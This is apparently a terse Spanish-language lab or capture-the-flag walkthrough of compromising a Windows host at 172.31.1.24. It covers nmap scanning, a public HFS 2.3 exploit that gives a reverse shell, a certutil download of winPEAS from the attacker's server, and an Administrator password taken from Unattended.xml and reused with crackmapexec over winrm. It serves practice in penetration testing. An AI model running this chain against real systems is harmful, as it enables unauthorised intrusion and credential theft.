nmap -A -p- -oA output 172.31.1.24 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.24 -oG allPorts

Pasted image 20210704153649.png

extractPorts allPorts

Pasted image 20210704153715.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.24 -oN targeted

Pasted image 20210704154037.png

nmap --script http-enum -p80 172.31.1.24 -oN webScan

whatweb 172.31.1.24:80

Pasted image 20210704154210.png

cat targeted

Pasted image 20210704154244.png

Pasted image 20210704154006.png

Buscamos HFS 2.3 en searchsploit

searchsploit HFS 2.3

Pasted image 20210704154538.png

Pasted image 20210704155301.png

searchsploit -m 49584.py

Cambiamos los puertos y las ips de lhost y rhost

python3 49584.py

Pasted image 20210704155026.png

Obtenemos un reverse shell

python3 -m http.server 8888

certutil -urlcache -split -f "http://10.10.0.12:8888/winPEASany.exe" winPEASany.exe"

Pasted image 20210704162935.png

.\winPEASEany.exe

Pasted image 20210704155340.png

whoami

syteminfo

whoami /priv

cd C:\Windows\Panther

file Unattended.xml

Pasted image 20210704155719.png

Pasted image 20210704155901.png

crackmapexec winrm 172.31.1.24 -u Administrator -p 'cnt4weRAbtXMTSVV' -x 'whoami'

boxes

copyright©2022 Cu3rv0x all rights reserved